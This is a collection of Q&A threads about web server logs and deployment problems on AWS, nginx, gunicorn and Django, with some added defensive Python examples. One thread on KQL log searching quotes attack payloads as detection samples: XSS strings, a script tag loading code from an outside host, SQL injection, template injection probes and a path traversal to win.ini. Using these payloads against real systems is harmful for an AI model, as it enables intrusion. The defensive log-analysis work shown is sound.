Deploying docker on AWS Beanstalk only serves html files, no other files - amazon-web-services

I have tried to get this project deployed to AWS Elastic Beanstalk: https://github.com/coralproject/talk. The Dockerfile exposes port 5000, and I have also defined environment variables, all using port 5000.
When I run the project locally with the recommended docker-compose file (https://coralproject.github.io/talk/installation-from-docker/#installing) everything works fine locally.
But when I deploy the app to Beanstalk, the html page is served and loads fine, however other files that are referenced locally such as my bundle.js and favicon files return a 502.
What am I missing?
Logs that may be relevant:
/var/log/eb-activity.log
cat: /var/app/current/Dockerrun.aws.json: No such file or directory
8c17e6ddb0f842e592940a3aa67d0f39ec8702eb4ad6c3f9b876fc33b7f02ddc
[2018-02-11T08:29:26.836Z] INFO [24507] - [Application update app-5d978-180211_092600#12/AppDeployStage1/AppDeployEnactHook/01flip.sh] : Starting activity...
[2018-02-11T08:29:28.428Z] INFO [24507] - [Application update app-5d978-180211_092600#12/AppDeployStage1/AppDeployEnactHook/01flip.sh] : Completed activity. Result:
nginx: [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/elasticbeanstalk-nginx-docker-proxy.conf:11
Stopping nginx: [ OK ]
Starting nginx: nginx: [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/elasticbeanstalk-nginx-docker-proxy.conf:11
[ OK ]
cat: /var/app/current/Dockerrun.aws.json: No such file or directory
/opt/elasticbeanstalk/hooks/common.sh: line 95: [: 1: unary operator expected
iptables: Saving firewall rules to /etc/sysconfig/iptables: [ OK ]
The nginx access log only shows the HTML requests, not the other files:
/var/log/nginx/access.log
95.90.245.122 - - [11/Feb/2018:22:43:00 +0000] "GET / HTTP/1.1" 302 72 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:43:00 +0000] "GET /admin/install HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:45:57 +0000] "GET /admin/install HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:46:04 +0000] "GET / HTTP/1.1" 302 72 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
95.90.245.122 - - [11/Feb/2018:22:46:04 +0000] "GET /admin/install HTTP/1.1" 304 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
I see this when I access the page:
install:45 GET https://talk-now.us-east-1.elasticbeanstalk.com:5000/static/coral-admin/bundle.js net::ERR_CONNECTION_REFUSED
:5000/public/img/favicon-32x32.png:1 GET https://talk-now.us-east-1.elasticbeanstalk.com:5000/public/img/favicon-32x32.png net::ERR_CONNECTION_REFUSED
:5000/public/img/favicon-16x16.png:1 GET https://talk-now.us-east-1.elasticbeanstalk.com:5000/public/img/favicon-16x16.png net::ERR_CONNECTION_REFUSED
:5000/public/img/favicon-96x96.png:1 GET https://talk-now.us-east-1.elasticbeanstalk.com:5000/public/img/favicon-96x96.png net::ERR_CONNECTION_REFUSED

The problem is that you are missing a Dockerrun.aws.json file at the root level of your repository. This file is necessary for Beanstalk to determine how to execute the set of containers in your project.
Also note that the format of the sections in this file is similar to that of Amazon ECS Task definitions.

Related

AWS Shield standard not preventing DDOS?

My website under Route 53 and ALB was flooded once on 12 May, but it seems the AWS Shield Standard version (free) didn't do anything to prevent it?
Showing 1000 of 9,828,102 records matched:
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3599.0 Safari/537.36" "-"
2022-05-12T08:01:25.024+08:00 51.15.0.133 - - [12/May/2022:00:01:24 +0000] "GET http://www.1980mu.com:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko" "-"
Shield Standard only protects Layer 3 and 4 of your application network stack, so it's expected that it would allow valid web traffic through. You would need to use Shield Advanced or WAF to gain greater control, and CloudFront to provide a caching layer (all paid services), to better protect your instances.
My advice is to follow the principle of least privilege at each layer in terms of firewall ports open and what hostnames you allow. You can use rate limiting via WAF to avoid getting flooded, and use CloudFront to intercept requests and return cached responses where possible to reduce load on your instances.
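As an added example (not part of the original answer), the two controls the answer names, a hostname allowlist and per-client rate limiting, can be checked offline against an access log before a WAF rule is written. The sample lines are constructed in the shape of the excerpt above; the allowed hostname, the five-minute window and the limit of 5 are assumptions chosen for the demo.

```python
import re
from collections import Counter
from datetime import datetime
from urllib.parse import urlsplit

# Combined-log fields; search() tolerates a leading log-shipper timestamp.
LINE_RE = re.compile(
    r'(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample (documentation IPs, example hostnames); not real traffic.
SAMPLE_LOG = (
    ['2022-05-12T08:01:25.024+08:00 203.0.113.7 - - [12/May/2022:00:01:24 +0000] '
     '"GET http://proxy-target.example:89/ HTTP/1.1" 200 8216 "-" "Mozilla/5.0" "-"'] * 6
    + ['198.51.100.20 - - [12/May/2022:00:01:30 +0000] '
       '"GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0" "-"',
       '198.51.100.20 - - [12/May/2022:00:03:10 +0000] '
       '"GET /about HTTP/1.1" 200 734 "-" "Mozilla/5.0" "-"']
)


def parse(line):
    """Return the parsed fields of one access-log line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # An absolute-URI target ("GET http://host:port/") names its own host.
    target = rec["target"]
    rec["target_host"] = urlsplit(target).hostname if "://" in target else None
    return rec


def analyze(lines, allowed_hosts, limit, window_s=300):
    """Flag clients over `limit` requests per window and foreign-host targets."""
    per_bucket = Counter()
    foreign = Counter()
    for rec in filter(None, map(parse, lines)):
        bucket = int(rec["when"].timestamp()) // window_s
        per_bucket[(rec["ip"], bucket)] += 1
        host = rec["target_host"]
        if host is not None and host not in allowed_hosts:
            foreign[(rec["ip"], host)] += 1
    over_limit = sorted({ip for (ip, _), n in per_bucket.items() if n > limit})
    return {"over_limit": over_limit, "foreign_host": dict(foreign)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG, {"www.example.org"}, limit=5))
```

Requests that name a host the site does not serve are candidates for a host-based block at the load balancer or WAF, and the over-limit list shows which clients a rate-based rule with that threshold would have caught.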

What is the best practice using KQL to filter desired attack signature over (web)logs?

Recently I've been experimenting with Logstash and Kibana on top of Elastic over (web) server logs. I tried to extract some attack signatures, such as XSS and SQL injection, like the following examples, where logs contain < $ ' " ! .\ %22, and so on:
<script>foo</script>
<script>document.cookie=%22testkzcp=XXX;%22</script>
<meta%20http-equiv=Set-Cookie%20content=%22testvpmi=XXXX%22>
${XXXXXXXXXX+5}.action
'.print(md5(XXXXX)).'
${#print(md5(XXXXX))}\
";print(md5(XXXXX));$a="
!(()&&!|*|*|
.\.\.\.\.\.\.\.\.\.\/windows/win.ini
The following is the common error I get when using "((", ".\", "OR" or "$" and so on in KQL:
KQLSyntaxError: Expected ":", "<", "<=", ">", ">=", AND, OR, end of input, whitespace but ")" found.
I checked The Kibana Query Language (KQL) and tried to use * as a wildcard query beside the interesting term "</script>" or "%22</script>" within my desired timestamp range, but it was unsuccessful. I also checked Escaping special characters in elasticsearch.
So the question is: what is the best practice for using KQL to filter/search desired string-based attack signatures over logs? Please give an example for the above-mentioned attack signatures.
Edit1: I found the post that says it's possible to solve this problem using regex in KQL, as well as some workarounds here & here, so I'm also interested in finding a regex-based solution to find the aforementioned patterns in KQL.
Example web requests within the above-mentioned patterns:
[21/Jan/2021:02:02:23 +0000] XX.XXX.XXX.X "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" - - TLSv1.2 -,-,-
[19/Jan/2021:23:02:37 +0000] XXX.XXX.XXX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "-1" OR 2+190-190-1=0+0+0+1 --" "-1" OR 2+190-190-1=0+0+0+1 --" - - TLSv1.2 -,-,-
[10/Jan/2021:01:11:02 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 "${#print(md5(31337))}" "${#print(md5(31337))}" - - TLSv1.2 -,-,-
[18/Jan/2022:09:13:00 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" - - TLSv1.2 -,-,-

IWebBrowser2 control blank - web page is not displayed

We display some web pages in our MFC application. We use an ordinary IWebBrowser2 object, and we just do a Navigate2() call to display a certain URL.
But often, the page is not displayed. We just get a blank (white) control in our dialog. If we right click and choose "Refresh", the page is displayed correctly. This doesn't happen all the time - sometimes the page is displayed as it should without Refresh.
And everything seems to be OK on the server. This is the log:
--- we do a Navigate2()
172.16.0.119 - - [24/Apr/2017:15:05:10 +0200] "GET /home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml HTTP/1.1" 200 31095 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:10 +0200] "GET /xslt/KVE865001.xslt HTTP/1.1" 200 10742 "http://172.29.8.80/xslt/KVE865001.xslt" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
--- we do a Refresh
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml HTTP/1.1" 304 - "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /xslt/KVE865001.xslt HTTP/1.1" 304 - "http://172.29.8.80/xslt/KVE865001.xslt" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /css/styles01.css HTTP/1.1" 200 905 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/topleft01.gif HTTP/1.1" 200 207 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/topright01.gif HTTP/1.1" 200 211 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/bottomleft01.gif HTTP/1.1" 200 209 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
172.16.0.119 - - [24/Apr/2017:15:05:40 +0200] "GET /images/bottomright01.gif HTTP/1.1" 200 208 "http://172.29.8.80/home/Rapport/a57cafd8-28ee-11e7-97b5-43f9990267b7.xml" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.9200"
First, only the XML and the XSLT files are fetched from the server - and the control is blank. When we Refresh, those files are fetched again. They don't need to be sent, though (status 304), so they were fetched correctly the first time. But the second time, the web browser control moves on, and also gets the CSS file and a couple of GIFs. And the page is displayed.
Does anybody know what could cause this "half hearted" loading of the web page the first time? Is there some "IWebBrowser2 quirk" we should know about, or something we could do differently in our application? We haven't been able to solve this - I would be VERY grateful for some help!
/Anders from Sweden

Django and wysiwyg editor (summernote) loads just sometimes

I have a problem with setting up https://github.com/lqez/django-summernote . I followed the steps in the configuration part and it works great with django runserver - I have summernote in the admin page etc. But when I add it to a public server, it loads just sometimes.
When I'm pressing F5 in the admin page, I can see that sometimes summernote loads and sometimes it doesn't. In nginx-error.log I have this message when it is not loaded:
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /admin/django_summernote/attachment/ HTTP/1.1" 200 3347 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
and I get something like:
Not Found
The requested URL /admin/django_summernote/attachment/ was not found on this server.
and this when it is loaded:
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/css/base.css HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/css/changelists.css HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/core.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/jquery.min.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/jquery.init.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/js/actions.min.js HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /admin/jsi18n/ HTTP/1.1" 200 2384 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
*ip* - - [20/Feb/2014:12:00:56 +0000] "GET /static/admin/img/icon_searchbox.png HTTP/1.1" 304 0 "http://domain.eu/admin/django_summernote/attachment/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
I'm really confused, because it is properly installed and works well with django runserver. And when it is properly loaded, it works just fine. My static dir also has these files:
`-- django_summernote
    |-- SOURCE
    |-- django_summernote.css
    |-- jquery.fileupload.js
    |-- jquery.iframe-transport.js
    |-- jquery.ui.widget.js
    |-- lang
    |-- summernote.css
    `-- summernote.min.js
Thanks
It must be in debug mode when you're running the django project with runserver.
If django runs in debug mode, serving static files via urls.py works fine. But this doesn't work as expected with debug=False.
You have to serve static files via a web server (like nginx) in production. Please refer to https://docs.djangoproject.com/en/dev/howto/static-files/

Bad request 400: nginx / gunicorn

I have followed this tutorial: http://blog.wercker.com/2013/11/25/django-16-part3.html and I am just trying to make it work locally with Vagrant for now. I am not trying to use Wercker.
After everything is installed, I try to access the website but I get a Bad Request (400) error every time. I do not know if that is due to a problem in nginx or in gunicorn.
They both have a log entry so at least I know that the request goes all the way through gunicorn and is not stopped at the nginx level.
Where is the problem located? Gunicorn? nginx?
Here are the logs of gunicorn and nginx.
I see that the favicon is missing, but that alone should not stop the page from being displayed, right?
Gunicorn:
>>> cat /var/local/sites/hellocities/run/gunicorn.error.log
10.0.0.1 - - [28/Jan/2014:07:05:16] "GET / HTTP/1.0" 400 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:09:43] "GET / HTTP/1.0" 400 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
Nginx:
>>> cat /var/log/nginx/hellocities-access.log
10.0.0.1 - - [28/Jan/2014:07:05:16 +0000] "GET / HTTP/1.1" 400 37 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:05:20 +0000] "GET /favicon.ico HTTP/1.1" 404 200 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:09:43 +0000] "GET / HTTP/1.1" 400 37 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
10.0.0.1 - - [28/Jan/2014:07:09:44 +0000] "GET /favicon.ico HTTP/1.1" 404 200 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36"
>>> cat /var/log/nginx/hellocities-error.log
2014/01/28 07:05:20 [error] 13886#0: *1 open() "/var/local/sites/hellocities/static/favicon.ico" failed (2: No such file or directory), client: 10.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", host: "10.0.0.200"
2014/01/28 07:09:44 [error] 13886#0: *3 open() "/var/local/sites/hellocities/static/favicon.ico" failed (2: No such file or directory), client: 10.0.0.1, server: _, request: "GET /favicon.ico HTTP/1.1", host: "10.0.0.200"
I had the same problem and adding ALLOWED_HOSTS = ("yourdomain.com",) to settings fixed it.
UPDATE: there are a few other possibilities:
Nginx (or whatever web server you use) doesn't pass the $host variable to the app
Host contains underscores
See details: https://blog.anvileight.com/posts/how-to-fix-bad-request-400-in-django/
As I was having the same issue (400 error code when trying to share with vagrant share), I stumbled upon this question. The answer and comments are right, as the obvious solution is to set the ALLOWED_HOSTS list, but I was already setting it correctly (I thought).
I can't speak for nginx as I'm running this on apache2, but here's what solved the issue:
Take a look at the ALLOWED_HOSTS doc to find what's best for your case.
With vagrant, you might find it useful to accept all the vagrantshare.com subdomains, so just add '.vagrantshare.com' (notice the dot) to the ALLOWED_HOSTS list.
Not sure if it is really necessary, but I changed the modified date of the wsgi.py file
touch wsgi.py
As I'm using apache2, I needed to restart the service.
sudo service apache2 restart
And then it worked.
I ran into this issue. It was because I forgot to add the proxy_set_header settings in the nginx config:
proxy_set_header Host $http_host;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
So Django didn't see the original hostname that was requested, so it didn't match with what was in ALLOWED_HOSTS. Then it gave back the 400 response.
After adding this to my nginx config (at the spot where you do the proxy_pass to Gunicorn) and then restarting nginx, it worked.
More info: https://docs.gunicorn.org/en/stable/deploy.html#nginx-configuration
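The answers above all come down to which Host value reaches Django and how it is compared with ALLOWED_HOSTS. The following is an added example, not code from Django, nginx or the posters: a simplified model of that check, with the function names, the proxy_pass target and the sample hostnames being assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

# Modelled on Django's host syntax check: letters, digits, dots and hyphens
# (or a bracketed IPv6 literal) plus an optional port. Underscores never match.
HOST_RE = re.compile(r"^([a-z0-9.-]+|\[[a-f0-9]*:[a-f0-9.:]+\])(:[0-9]+)?$")

# Constructed values for the demo.
ALLOWED = [".vagrantshare.com"]
PROXY_PASS = "http://127.0.0.1:8000"


def split_domain(host_header):
    """Return the lower-cased domain without port, or "" if malformed."""
    host = host_header.lower()
    if not HOST_RE.match(host):
        return ""                      # e.g. an underscore in the name
    if host.endswith("]"):
        return host                    # bare IPv6 literal, no port
    domain = host.rsplit(":", 1)[0] if ":" in host else host
    return domain[:-1] if domain.endswith(".") else domain


def host_allowed(host_header, allowed_hosts):
    """True if the Host header matches an ALLOWED_HOSTS-style pattern."""
    domain = split_domain(host_header)
    if not domain:
        return False
    for pattern in (p.lower() for p in allowed_hosts):
        if pattern == "*" or pattern == domain:
            return True
        # A leading dot matches the bare domain and every subdomain.
        if pattern.startswith(".") and (
            domain.endswith(pattern) or domain == pattern[1:]
        ):
            return True
    return False


def host_seen_by_app(client_host, proxy_pass, forwards_host):
    """Host header the upstream app receives from nginx."""
    # With "proxy_set_header Host $http_host;" the client's value is passed on;
    # without it nginx sends $proxy_host, the name and port from proxy_pass.
    return client_host if forwards_host else urlsplit(proxy_pass).netloc


def status_for(client_host, allowed_hosts, proxy_pass, forwards_host):
    """HTTP status the app would return for this request: 200 or 400."""
    host = host_seen_by_app(client_host, proxy_pass, forwards_host)
    return 200 if host_allowed(host, allowed_hosts) else 400


if __name__ == "__main__":
    for forwards in (True, False):
        print(forwards, status_for("demo.vagrantshare.com", ALLOWED, PROXY_PASS, forwards))
```

The same request flips from 200 to 400 when the header is not forwarded, because the app then validates the proxy_pass address instead of the name the client asked for.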